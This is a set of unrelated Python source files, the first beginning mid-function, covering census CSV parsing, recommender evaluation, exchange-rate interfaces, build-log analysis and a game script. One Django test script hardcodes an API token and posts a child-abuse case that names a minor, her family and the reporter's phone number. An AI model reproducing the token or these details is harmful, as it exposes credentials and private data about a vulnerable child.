with open(filepath) as csvfile:
file_reader = csv.reader(csvfile)
line = next(file_reader)
class Column(Enum):
SERIALNO = line.index('SERIALNO')
ST = line.index('ST')
PUMA = line.index('PUMA')
AGEP = line.index('AGEP')
SCHL = line.index('SCHL')
MAR = line.index('MAR')
HICOV = line.index('HICOV')
RACBLK = line.index('RACBLK') # 0 = not black; 1 = black
DIS = line.index('DIS') # 1 = disabled; 2 = not disabled
MIL = line.index('MIL') # 1-3 = veteran
WAOB = line.index('WAOB') # 1-2 = non-immigrant
NWAB = line.index('NWAB') # 1 = temp work absence; 2 = no
try:
i = 0
while True:
acs_row = next(file_reader)
serial_number = acs_row[Column.SERIALNO.value]
person = Person(serial_number)
state = acs_row[Column.ST.value]
person.state = state # TODO make an enum of state names and use it here
person.puma = state + acs_row[Column.PUMA.value] + year
person.age = acs_row[Column.AGEP.value]
person.education = acs_row[Column.SCHL.value]
if acs_row[Column.MAR.value] == '3':
person.divorced = True
else:
person.divorced = False
if acs_row[Column.HICOV.value] == '1':
person.insured = True
else:
person.insured = False
if acs_row[Column.RACBLK.value] == '1':
person.black = True
else:
person.black = False
if acs_row[Column.DIS.value] == '1':
person.disabled = True
else:
person.disabled = False
mil = acs_row[Column.MIL.value]
if mil == '1' or mil == '2' or mil == '3':
person.veteran = True
else:
person.veteran = False
if acs_row[Column.WAOB.value] == '1' or acs_row[Column.WAOB.value] == '2':
person.immigrant = False
else:
person.immigrant = True
nwab = acs_row[Column.NWAB.value]
if nwab == '1':
person.unemployed = True
elif nwab == '2' or nwab == 'b':
person.unemployed = False
else:
person.unemployed = 'NA'
id = serial_number + state + year
dictionary_of_people[id] = person
# i += 1
# logger.log('Setting up person #', format(i, ',d'), erase=True)
except StopIteration:
pass
logger.log('Created', format(len(dictionary_of_people), ',d'), 'people from', filepath)
return dictionary_of_people
def get_responses(filepath, year):
numbers = list()
with open(filepath) as csvfile:
file_reader = csv.reader(csvfile)
line = next(file_reader)
class Column(Enum):
SERIALNO = line.index('SERIALNO')
ST = line.index('ST')
PUMA = line.index('PUMA')
AGEP = line.index('AGEP')
SCHL = line.index('SCHL')
MAR = line.index('MAR')
HICOV = line.index('HICOV')
RACBLK = line.index('RACBLK') # 0 = not black; 1 = black
DIS = line.index('DIS') # 1 = disabled; 2 = not disabled
MIL = line.index('MIL') # 1-3 = veteran
WAOB = line.index('WAOB') # 1-2 = non-immigrant
NWAB = line.index('NWAB') # 1 = temp work absence; 2 = no
total = 0
divorced = 0
insured = 0
black = 0
disabled = 0
veteran = 0
immigrant = 0
unemployed = 0
try:
while True:
acs_row = next(file_reader)
total += 1
# education += 1
if acs_row[Column.MAR.value]: # has a value
divorced += 1
if acs_row[Column.HICOV.value]: # has a value
insured += 1
if acs_row[Column.RACBLK.value]: # has a value
black += 1
if acs_row[Column.DIS.value]: # has a value
disabled += 1
if acs_row[Column.MIL.value]: # has a value
veteran += 1
if acs_row[Column.WAOB.value]: # has a value
immigrant += 1
if acs_row[Column.NWAB.value] and not acs_row[Column.NWAB.value] == '3': # has a value, and was reported
unemployed += 1
except StopIteration:
pass
numbers = [float(divorced) / total, float(insured) / total, float(black) / total, float(disabled) / total, float(veteran) / total, float(immigrant) / total, float(unemployed) / total]
return numbers
|
from digitize import digitize
from bincount import bincount
|
########################################################
# evaluator.py
# Author: Jamie Zhu <jimzhu@GitHub>
# Created: 2014/2/6
# Last updated: 2015/8/30
########################################################
import numpy as np
from numpy import linalg as LA
import time, sys, os
import random
import logging
import multiprocessing
import cPickle as pickle
from PPCF import P_UIPCC
from PPCF.commons import evaluator
#======================================================#
# Function to evaluate the approach at each density
#======================================================#
def execute(matrix, para):
# loop over each density and each round
if para['parallelMode']: # run on multiple processes
pool = multiprocessing.Pool()
for den in para['density']:
for roundId in xrange(para['rounds']):
pool.apply_async(executeOneSetting, (matrix, den, roundId, para))
pool.close()
pool.join()
else: # run on a single process
for den in para['density']:
for roundId in xrange(para['rounds']):
executeOneSetting(matrix, den, roundId, para)
# summarize the dumped results
summarizeResult(para)
#======================================================#
# Function to run the prediction approach at one setting
#======================================================#
def executeOneSetting(matrix, density, roundId, para):
logging.info('density=%.2f, %2d-round starts.'%(density, roundId + 1))
startTime = time.clock()
timeResult = np.zeros(5)
evalResult = np.zeros((len(para['metrics']), 5))
# remove entries from the data matrix
logging.info('Removing entries from data matrix...')
(trainMatrix, testMatrix) = evaluator.removeEntries(matrix, density, roundId)
# data perturbation by adding noises
logging.info('Data perturbation...')
(perturbMatrix, uMean, uStd) = randomPerturb(trainMatrix, para)
# UMEAN
logging.info('UMEAN prediction...')
iterStartTime1 = time.clock()
predMatrixUMEAN = P_UIPCC.UMEAN(perturbMatrix)
timeResult[0] = time.clock() - iterStartTime1
# IMEAN
logging.info('IMEAN prediction...')
iterStartTime2 = time.clock()
predMatrixIMEAN = P_UIPCC.IMEAN(perturbMatrix)
timeResult[1] = time.clock() - iterStartTime2
# UPCC
logging.info('UPCC prediction...')
iterStartTime3 = time.clock()
predMatrixUPCC = P_UIPCC.UPCC(perturbMatrix, para)
timeResult[2] = time.clock() - iterStartTime3 + timeResult[0]
# IPCC
logging.info('IPCC prediction...')
iterStartTime4 = time.clock()
predMatrixIPCC = P_UIPCC.IPCC(perturbMatrix, para)
timeResult[3] = time.clock() - iterStartTime4 + timeResult[1]
# UIPCC
logging.info('UIPCC prediction...')
iterStartTime5 = time.clock()
predMatrixUIPCC = P_UIPCC.UIPCC(perturbMatrix, predMatrixUPCC, predMatrixIPCC, para)
timeResult[4] = time.clock() - iterStartTime5 + timeResult[2] + timeResult[3]
# evaluate the estimation error
predMatrixUMEAN = reNormalize(predMatrixUMEAN, uMean, uStd)
evalResult[:, 0] = evaluator.evaluate(testMatrix, predMatrixUMEAN, para)
predMatrixIMEAN = reNormalize(predMatrixIMEAN, uMean, uStd)
evalResult[:, 1] = evaluator.evaluate(testMatrix, predMatrixIMEAN, para)
predMatrixUPCC = reNormalize(predMatrixUPCC, uMean, uStd)
evalResult[:, 2] = evaluator.evaluate(testMatrix, predMatrixUPCC, para)
predMatrixIPCC = reNormalize(predMatrixIPCC, uMean, uStd)
evalResult[:, 3] = evaluator.evaluate(testMatrix, predMatrixIPCC, para)
predMatrixUIPCC = reNormalize(predMatrixUIPCC, uMean, uStd)
evalResult[:, 4] = evaluator.evaluate(testMatrix, predMatrixUIPCC, para)
# dump the result at each density
result = (evalResult, timeResult)
outFile = '%s%s_%s_result_%.2f_round%02d.tmp'%(para['outPath'], para['dataName'],
para['dataType'], density, roundId + 1)
evaluator.dumpresult(outFile, result)
logging.info('density=%.2f, %2d-round done.'%(density, roundId + 1))
logging.info('----------------------------------------------')
#======================================================#
# Function to process the raw result files
# Override evalib.summarizeResult()
#======================================================#
def summarizeResult(para):
approach = ['UMEAN', 'IMEAN', 'UPCC', 'IPCC', 'UIPCC']
path = '%s%s_%s_result'%(para['outPath'], para['dataName'], para['dataType'])
evalResults = np.zeros((len(para['density']), para['rounds'], len(para['metrics']), len(approach)))
timeResult = np.zeros((len(para['density']), para['rounds'], len(approach)))
k = 0
for den in para['density']:
for rnd in xrange(para['rounds']):
inputfile = path + '_%.2f_round%02d.tmp'%(den, rnd + 1)
with open(inputfile, 'rb') as fid:
data = pickle.load(fid)
(evalResults[k, rnd, :, :], timeResult[k, rnd, :]) = data
os.remove(inputfile)
k += 1
for i in xrange(len(approach)):
evaluator.saveSummaryResult(path + '_' + approach[i], evalResults[:, :, :, i], timeResult[:, :, i], para)
#======================================================#
# Function to perturb the entries of data matrix
#======================================================#
def randomPerturb(matrix, para):
perturbMatrix = matrix.copy()
(numUser, numService) = matrix.shape
uMean = np.zeros(numUser)
uStd = np.zeros(numUser)
noiseRange = para['noiseRange']
# z-score normalization
for i in xrange(numUser):
qos = matrix[i, :]
qos = qos[qos != 0]
mu = np.average(qos)
sigma = np.std(qos)
uMean[i] = mu
uStd[i] = sigma
perturbMatrix[i, :] = (perturbMatrix[i, :] - mu) / sigma
if para['noiseType'] == 'gaussian':
noiseVec = np.random.normal(0, noiseRange, numService)
elif para['noiseType'] == 'uniform':
noiseVec = np.random.uniform(-noiseRange, noiseRange, numService)
perturbMatrix[i, :] += noiseVec
perturbMatrix[matrix == 0] = 0
return (perturbMatrix, uMean, uStd)
#======================================================#
# Function to reverse the z-score normalization of a predicted matrix
#======================================================#
def reNormalize(matrix, uMean, uStd):
numUser = matrix.shape[0]
resultMatrix = matrix.copy()
for i in xrange(numUser):
resultMatrix[i, :] = resultMatrix[i, :] * uStd[i] + uMean[i]
resultMatrix[resultMatrix < 0] = 0
return resultMatrix
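#======================================================#
# Hypothetical usage sketch (not part of the original file): 'para' is never
# defined in this module; the keys below are inferred from the accesses
# above, and all values are illustrative only.
#======================================================#
if __name__ == '__main__':
    demoPara = {
        'dataName': 'demo',          # prefix for the result files
        'dataType': 'rt',            # assumed matrix-type tag
        'outPath': './',             # where the .tmp/.txt results go
        'metrics': ['MAE', 'RMSE'],  # one row per metric in evalResult
        'density': [0.1],            # matrix densities to evaluate
        'rounds': 1,                 # repetitions per density
        'parallelMode': False,       # True -> multiprocessing.Pool
        'noiseType': 'gaussian',     # or 'uniform'
        'noiseRange': 0.1,           # noise std dev (gaussian) / half-width (uniform)
    }
    execute(np.random.rand(20, 20), demoPara)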
|
from typing import Protocol, Iterable, runtime_checkable
from datetime import date
from decimal import Decimal
from quickforex.domain import CurrencyPair, DateRange
@runtime_checkable
class ProviderBase(Protocol):
identifier: str
def get_latest_rates(
self, currency_pairs: Iterable[CurrencyPair]
) -> dict[CurrencyPair, Decimal]:
"""
:param currency_pairs: Currency pairs for which to retrieve the exchange rates
:return: Last exchange rate for each provided currency pair.
"""
...
def get_latest_rate(self, currency_pair: CurrencyPair) -> Decimal:
"""
:param currency_pair:
:return: Last exchange rate for the provided currency pair.
"""
...
def get_historical_rates(
self, currency_pairs: Iterable[CurrencyPair], as_of: date
) -> dict[CurrencyPair, Decimal]:
"""
:param currency_pairs:
:param as_of:
:return: Historical exchange rate for each provided currency pair.
"""
...
def get_historical_rate(self, currency_pair: CurrencyPair, as_of: date) -> Decimal:
"""
:param currency_pair:
:param as_of:
:return: Historical exchange rate for the provided currency pair.
"""
...
def get_rates_time_series(
self, currency_pairs: Iterable[CurrencyPair], date_range: DateRange
) -> dict[CurrencyPair, dict[date, Decimal]]:
"""
:param currency_pairs: Currency pairs for which to retrieve the exchange rates. This argument can either be
a list of currency pairs or a single currency pair.
:param date_range: Date range over which the exchange rates should be retrieved.
:return:
"""
...
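# A minimal sketch (illustrative, not part of the library) of a class that
# structurally satisfies this protocol with a constant rate of 1:
class _FixedRateProvider:
    identifier = "fixed"

    def get_latest_rates(
        self, currency_pairs: Iterable[CurrencyPair]
    ) -> dict[CurrencyPair, Decimal]:
        return {pair: Decimal(1) for pair in currency_pairs}

    def get_latest_rate(self, currency_pair: CurrencyPair) -> Decimal:
        return Decimal(1)

    def get_historical_rates(
        self, currency_pairs: Iterable[CurrencyPair], as_of: date
    ) -> dict[CurrencyPair, Decimal]:
        return {pair: Decimal(1) for pair in currency_pairs}

    def get_historical_rate(self, currency_pair: CurrencyPair, as_of: date) -> Decimal:
        return Decimal(1)

    def get_rates_time_series(
        self, currency_pairs: Iterable[CurrencyPair], date_range: DateRange
    ) -> dict[CurrencyPair, dict[date, Decimal]]:
        return {pair: {} for pair in currency_pairs}


if __name__ == "__main__":
    # @runtime_checkable makes isinstance() verify member presence only,
    # not signatures:
    assert isinstance(_FixedRateProvider(), ProviderBase)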
|
"""
Write a Python program that generates 7 random numbers
and prints their sum.
If the sum is divisible by 7, also print the word "Boom"
"""
|
# from django.test import TestCase
import requests
# from django.utils.timezone import utc
# Create your tests here.
# default=datetime.datetime(2019, 8, 23, 17, 59, 40, 153036, tzinfo=utc)
url = 'http://localhost:8004/api/v1/crs/'
# url = 'https://test.cpims.net/api/v1/crs/'
# url = 'http://childprotection.go.ke/api/v1/crs/'
headers = {'Authorization': 'Token 330764ede3eb59acca76b8f064b84eb477ff452e'}
data = {"county": "001", "constituency": "001", "case_category": "CDIS",
"child_dob": "2010-06-15", "perpetrator": "PKNW",
"child_first_name": "Susan", "child_surname": "Atieno",
"case_landmark": "Near kiroboto primary",
"case_narration": "Child was abducted", "child_sex": "SMAL",
"reporter_first_name": "Mark", "reporter_surname": "Masai",
"reporter_telephone": "254722166058",
"reporter_county": "001", "reporter_sub_county": "001",
"case_reporter": "CRSF", "organization_unit": "Helpline",
"hh_economic_status": "UINC", "family_status": "FSUK",
"mental_condition": "MNRM", "physical_condition": "PNRM",
"other_condition": "CHNM", "risk_level": "RLMD",
"case_date": "2019-10-14",
"perpetrators": [{"relationship": "RCPT", "first_name": "James",
"surname": "Kamau", "sex": "SMAL"}],
"caregivers": [{"relationship": "CGPM", "first_name": "Mama",
"surname": "Atieno", "sex": "SMAL"}],
"case_details": [{'category': 'CIDS',
'place_of_event': 'PEHF',
'date_of_event': '2019-09-01',
'nature_of_event': 'OOEV'}]}
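# NOTE: the second payload below replaces the sample payload above; only it is posted.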
data = {'hh_economic_status': 'UINC', 'child_sex': 'SFEM', 'case_reporter': 'CRSF', 'physical_condition': 'no', 'case_date': '2020-09-13', 'reporter_first_name': 'Leonard', 'county': '047', 'reporter_county': '047', 'reporter_surname': 'mbugua', 'perpetrators': [{'first_name': '', 'surname': '', 'relationship': '', 'sex': 'SMAL'}], 'other_condition': 'CHNM', 'risk_level': 'RLMD', 'perpetrator': 'PKNW', 'mental_condition': 'MNRM', 'family_status': 'FSUK', 'case_narration': u"Leonard mbugua from nairobi county, kasarani sb county in ruai ward called the line with number 704241274 to say her neighbour Tabitha Nyokabi age 17 years has been physically assaulted by her step father Antony wanjohi. her mothers name is Leah wangui. she says sometimes he makes sexual advances towards her. she has tried telling her mother about the incident and all she does is talk to him but does not chase him out of their home. she says she had reported the matter to the police station he was arrested and released on the same day. she was asking for assistance and she was referred to the chiefs office and the children's office", 'organization_unit': 'Helpline', 'caregivers': [{'first_name': 'Leah', 'surname': 'wangui', 'relationship': 'CGPM', 'sex': 'SMAL'}], 'reporter_sub_county': '280', 'case_details': [{'category': 'CSNG', 'place_of_event': 'PEHF', 'date_of_event': '2020-09-13', 'nature_of_event': 'OOEV'}], 'child_surname': 'wangui', 'reporter_telephone': '704241274', 'case_category': 'CSNG', 'case_landmark': 'st john primary', 'child_first_name': 'Leah', 'constituency': '280', 'child_dob': '2020-09-13'}
response = requests.post(url, json=data, headers=headers)
# data = {"case_id": "64d2a692-ef3c-11e9-98c6-d4258b5a3abb"}
# response = requests.get(url, params=data, headers=headers)
# print (response)
print('==' * 50, 'HEADERS', '==' * 50)
print(response.headers)
print('\n')
print('==' * 50, 'CONTENT', '==' * 50)
print(response.content)
'''
case_id = 'f6e09348-c5d2-11e9-9018-d4258b5a3abb'
response = requests.get(url, params={"case_id": case_id}, headers=headers)
print (response)
print (response.headers)
print (response.content)
'''
|
import frappe
def execute():
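# Patch entry point: create the default Niyopolymers letterhead once;
# re-runs are no-ops via the DuplicateEntryError guard below.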
try:
frappe.get_doc({
'doctype': 'Letter Head',
'letter_head_name': 'Niyopolymers - Default',
'is_default': 1,
'source': 'Image',
'image': '/assets/niyopolymers/images/niyopolymer_letter_head.png'
}).insert()
frappe.db.commit()
except frappe.DuplicateEntryError:
pass
|
"""Console script for xweights."""
import sys
import dask
from dask.distributed import Client
from .xweights import compute_weighted_means
from ._parser import args
from ._regions import (which_regions,
which_subregions)
def main():
"""Console script for xweights."""
if args.which_regions:
print(which_regions())
return
if args.which_subregions:
print(which_subregions(args.which_subregions))
return
if not args.input_files:
raise TypeError('Please select an input file with the option -i. You can choose between netCDF file(s), directories containing such files, and intake-esm catalogue files.')
if not args.region:
raise TypeError('Please select a pre-defined region or a user-given shapefile with the option -r. Use -which_regions to show pre-defined regions and use -which_subregions <region_name> to show subregions of the specified pre-defined region.')
weighted_means = compute_weighted_means(args.input_files,
region=args.region,
subregion=args.subregion,
domain_name=args.domain,
time_range=args.time_range,
column_names=args.csv_column_names,
merge_columns=args.merge_columns,
column_merge=args.column_merge,
outdir=args.output_directory,
time_stat=args.time_statistics,
land_only=args.land_only,
**args.kwargs,
)
return 0
if __name__ == "__main__":
with Client() as client:
sys.exit(main())
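# Example invocation (the entry-point name and file/region values are
# illustrative; only the -i and -r options are referenced above):
#   xweights -i data/tas_EUR-11.nc -r prudence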
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.views.generic.base import RedirectView
urlpatterns = patterns(
'',
# Examples:
# url(r'^$', 'webkeeper.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', 'common.views.home', name='home'),
url(r'^index$', 'common.views.welcome', name='index'),
url(r'^logout$', 'common.views.logout', name='logout'),
url(r'^ax/login$', 'common.views.login', name='login'),
url(r'^ax/register$', 'common.views.register', name='register'),
url(r'^nc/', include('nc.urls')),
url(r'^tutor/', include('tutor.urls')),
url(r'^tree$', 'common.views.tree', name='tree'),
)
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
root_path = os.path.abspath(os.path.join(os.getcwd(), ".."))
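# Convert an elapsed-time string of the form "M:SS.ss" to whole seconds, rounding up.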
def strToSecond(strTime):
minute = int(strTime.split(':')[0])
second = int(strTime.split(':')[1].split('.')[0]) + 1
return minute * 60 + second
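# Grep the raw build log down to compile steps with a measurable elapsed time (> 0:00).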
def getUsefulBuildTimeFile(filename):
os.system(
"grep -Po -- '-o .*' %s | grep ' elapsed' | grep -P -v '0:00.* elapse' > %s/tools/analysis_build_time"
% (filename, root_path))
os.system(
"grep -v -- '-o .*' %s |grep ' elapse' | grep -P -v '0:00.* elapse' >> %s/tools/analysis_build_time"
% (filename, root_path))
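# Aggregate per-step compile times and write them, longest first, to tools/buildTime.txt.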
def analysisBuildTime():
filename = '%s/build/build-time' % root_path
getUsefulBuildTimeFile(filename)
os.system('rm -rf %s/tools/tempbuildTime.txt' % root_path)
with open('%s/tools/analysis_build_time' % root_path, 'r') as f:
lines = f.readlines()
for line in lines:
try:
line = line.strip()
if '-o ' in line:
buildFile = line.split(', ')[0].split(' ')[1]
buildTime = line.split(', ')[1].split('elapsed')[0].strip()
secondTime = strToSecond(buildTime)
os.system("echo %s, %s >> %s/tools/tempbuildTime.txt" %
(buildFile, secondTime, root_path))
else:
buildTime = line.split(', ')[1].split('elapsed')[0].strip()
secondTime = strToSecond(buildTime)
if secondTime > 30:
os.system("echo %s, %s >> %s/tools/tempbuildTime.txt" %
(line, secondTime, root_path))
except (ValueError, IndexError):  # skip malformed log lines
print(line)
os.system(
'sort -n -k 2 -r %s/tools/tempbuildTime.txt > %s/tools/buildTime.txt' %
(root_path, root_path))
analysisBuildTime()
|
from ActionHelper import *
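# Decompiled battle-arts script for as90000.dat: main() registers the craft
# name table, and each Craft_* block below replays one art's camera, effect,
# and damage sequence.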
def main():
CreateArtsAction("as90000.dat")
CraftAction((
"移动", # 00 0
"移动", # 01 1
"移动", # 02 2
"移动", # 03 3
"移动", # 04 4
"移动", # 05 5
"移动", # 06 6
"移动", # 07 7
"移动", # 08 8
"移动", # 09 9
"石之芒", # 0A 10
"地震波", # 0B 11
"石化之息", # 0C 12
"大地之矛", # 0D 13
"世界之树", # 0E 14
"巨神狂怒震", # 0F 15
"Craft_10_16_BE5", # 10 16
"Craft_11_17_D69", # 11 17
"防壁之符文", # 12 18
"防壁之符文", # 13 19
"冰之刃", # 14 20
"冰蓝之泪", # 15 21
"冰之锤", # 16 22
"水流轰击", # 17 23
"钻石星尘", # 18 24
"大海啸", # 19 25
"灭世冥寒灾", # 1A 26
"Craft_1B_27_1832", # 1B 27
"慈爱之符文", # 1C 28
"慈爱之符文", # 1D 29
"火之矢", # 1E 30
"灼热之波", # 1F 31
"熔岩之息", # 20 32
"炎蝶之舞", # 21 33
"赤红射线", # 22 34
"龙皇炼狱火", # 23 35
"Craft_24_36_2131", # 24 36
"Craft_25_37_2132", # 25 37
"胜利之符文", # 26 38
"胜利之符文", # 27 39
"雷电击", # 28 40
"风之镰", # 29 41
"风之领域", # 2A 42
"闪电之力", # 2B 43
"雷光龙卷", # 2C 44
"终焉三重奏", # 2D 45
"Craft_2E_46_29DE", # 2E 46
"Craft_2F_47_29DF", # 2F 47
"暴风之符文", # 30 48
"暴风之符文", # 31 49
"心灵之霞", # 32 50
"死亡螺旋", # 33 51
"暗影裁决", # 34 52
"灾厄镰刃", # 35 53
"堕天使暗翼", # 36 54
"Craft_37_55_3063", # 37 55
"Craft_38_56_3064", # 38 56
"Craft_39_57_3065", # 39 57
"刹那之符文", # 3A 58
"刹那之符文", # 3B 59
"暗物质", # 3C 60
"光子飞射", # 3D 61
"大灾变", # 3E 62
"金耀辉环", # 3F 63
"天劫轮回光", # 40 64
"Craft_41_65_3AF5", # 41 65
"Craft_42_66_3AF6", # 42 66
"Craft_43_67_3AF7", # 43 67
"震天之符文", # 44 68
"震天之符文", # 45 69
"混沌烙印", # 46 70
"幻影之塔", # 47 71
"天国之门", # 48 72
"银色荆刺", # 49 73
"幻银方舟炮", # 4A 74
"Craft_4B_75_4774", # 4B 75
"Craft_4C_76_4775", # 4C 76
"Craft_4D_77_4776", # 4D 77
"幻影之符文", # 4E 78
"幻影之符文", # 4F 79
"大地治愈", # 50 80
"结晶防护", # 51 81
"结晶防护·复", # 52 82
"坚韧守护", # 53 83
"Craft_54_84_499B", # 54 84
"Craft_55_85_499C", # 55 85
"Craft_56_86_499D", # 56 86
"Craft_57_87_499E", # 57 87
"强音之力", # 58 88
"强音之力·复", # 59 89
"振奋之激", # 5A 90
"Craft_5B_91_4B0C", # 5B 91
"Craft_5C_92_4B0D", # 5C 92
"Craft_5D_93_4B0E", # 5D 93
"Craft_5E_94_4B0F", # 5E 94
"Craft_5F_95_4B10", # 5F 95
"生命之息", # 60 96
"圣灵之息", # 61 97
"风之精灵", # 62 98
"大治愈术", # 63 99
"精灵之歌", # 64 100
"Craft_65_101_4FBD", # 65 101
"Craft_66_102_4FBE", # 66 102
"Craft_67_103_4FBF", # 67 103
"时间减速", # 68 104
"时间驱动", # 69 105
"灾厄之爪", # 6A 106
"Craft_6B_107_51E1", # 6B 107
"Craft_6C_108_51E2", # 6C 108
"Craft_6D_109_51E3", # 6D 109
"Craft_6E_110_51E4", # 6E 110
"Craft_6F_111_51E5", # 6F 111
"魔导祝福", # 70 112
"A-反射屏障", # 71 113
"圣灵苏生", # 72 114
"纯净弧光", # 73 115
"Craft_74_116_5520", # 74 116
"Craft_75_117_5521", # 75 117
"Craft_76_118_5522", # 76 118
"Craft_77_119_5523", # 77 119
"神圣祝福", # 78 120
"虚空幻域", # 79 121
"狂乱之月", # 7A 122
"星之守护", # 7B 123
"情报解析", # 7C 124
"Craft_7D_125_58A0", # 7D 125
"Craft_7E_126_58A1", # 7E 126
"Craft_7F_127_58A2", # 7F 127
"回复术", # 80 128
"中回复术", # 81 129
"大回复术", # 82 130
"水之幻影", # 83 131
"封魔领域", # 84 132
"中复苏术", # 85 133
"复苏术", # 86 134
"全回复术", # 87 135
"Craft_88_136_5CC0", # 88 136
"Craft_88_136_5CC0", # 89 137
"Craft_88_136_5CC0", # 8A 138
"Craft_88_136_5CC0", # 8B 139
))
def Craft_移动(): pass
label("移动")
Return()
# 移动 end
def Craft_石之芒(): pass
label("石之芒")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg010_00.eff")
AS_78(0)
Sleep(125)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(750)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
AS_14(0x0)
Call("loc_1D5")
Return()
label("loc_1D5")
FreeEffect(0x0)
FreeEffect(0x1)
FreeEffect(0x2)
FreeEffect(0x3)
FreeEffect(0x4)
FreeEffect(0x5)
FreeEffect(0x6)
FreeEffect(0x7)
CallReturn()
# 石之芒 end
def Craft_地震波(): pass
label("地震波")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg011_00.eff")
LoadEffect(0x1, "battle\\mg010_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 0, 0, 500)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(600)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(500)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(500)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(500)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(250)
Yield()
EndChrThread(0xFF, 3)
ResetTarget()
label("loc_2E5")
ForeachTarget("loc_30E")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(100)
Yield()
NextTarget()
Jump("loc_2E5")
label("loc_37")
ResetTarget()
label("loc_38")
ForeachTarget("loc_47")
DamageAnime(0xFE, 0x0, 0x32)
Sleep(50)
Yield()
NextTarget()
Jump("loc_38")
label("loc_47")
Return()
label("loc_30E")
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
label("loc_2")
ResetTarget()
label("loc_3")
ForeachTarget("loc_14")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(50)
Yield()
NextTarget()
Jump("loc_3")
label("loc_14")
CallReturn()
# 地震波 end
def Craft_石化之息(): pass
label("石化之息")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg012_00.eff")
LoadEffect(0x1, "battle\\mg012_01.eff")
AS_78(0)
Sleep(300)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
AS_3D(100, 100, 100, 200)
Sleep(1200)
Yield()
LockCamera(0xFE, 0, 800, 0, 2000)
AS_B0(0x1E, 0x7D0)
Sleep(2400)
Yield()
AS_31(0x17, 0x1F4)
Sleep(600)
Yield()
label("loc_3AE")
ForeachTarget("loc_3D3")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
NextTarget()
Jump("loc_3AE")
label("loc_3D3")
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 石化之息 end
def Craft_大地之矛(): pass
label("大地之矛")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg013_00.eff")
AS_78(0)
Sleep(300)
Yield()
SetBrightness(0x0, 0x0, 300)
Fade(0x1, 500, 0x0)
AS_60(0xF7)
AS_5F(0xFC, 0x0)
AS_5F(0xFF, 0x0)
AS_31(0x11, 0x0)
AS_3A(0xFF92, 0x0)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTargetAdd(0xFF, "", 0x0)
LookingTarget(300, 28, 20)
AS_B0(0x14, 0x0)
Sleep(500)
Yield()
AS_3D(100, 100, 100, 500)
BlurSwitch(0x1F4, 0xBBFFFFFF, 0x0, 0x0, 0x1)
PlayEffect(0xFF, 0xFF, 0x0, 0x4, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 4)
SetCameraDistance(23000, 600)
AS_3D(300, 300, 300, 500)
Sleep(400)
Yield()
AS_B0(0x1E, 0x320)
AS_3A(0xFFF6, 0x3E8)
Sleep(200)
Yield()
AS_3D(200, 200, 200, 1300)
CancelBlur(300)
Sleep(1200)
Yield()
SetCameraDistance(21000, 100)
Sleep(500)
Yield()
SetCameraDistance(24000, 600)
AS_3D(600, 600, 600, 800)
Sleep(500)
Yield()
Sleep(400)
Yield()
ResetBrightness(500)
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 20, 30)
Sleep(500)
Yield()
ResetTarget()
AS_83(0x0)
label("loc_4CE")
ForeachTarget("loc_4DF")
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(30)
Yield()
NextTarget()
Jump("loc_4CE")
label("loc_4DF")
WaitChrThread(0xFF, 1)
SetBrightness(0x0, 0x1, 0)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_5F(0xF7, 0x1)
AS_31(0x17, 0x0)
Call("loc_1D5")
Return()
# 大地之矛 end
def Craft_世界之树(): pass
label("世界之树")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg014_00.eff")
LoadEffect(0x1, "battle\\mg014_01.eff")
LoadEffect(0x2, "battle\\mg014_02.eff")
AS_78(0)
Sleep(300)
Yield()
AS_43(0x0, 0x12C, 0x0)
SetBrightness(0x0, 0x0, 500)
Sleep(300)
Yield()
Fade(0x1, 300, 0x0)
AS_60(0xF7)
LockCamera(0xFB, 0, 0, 0, 0)
SetCameraDistance(35000, 0)
SetCameraDegree(15, 35, 0, 0)
Sleep(600)
Yield()
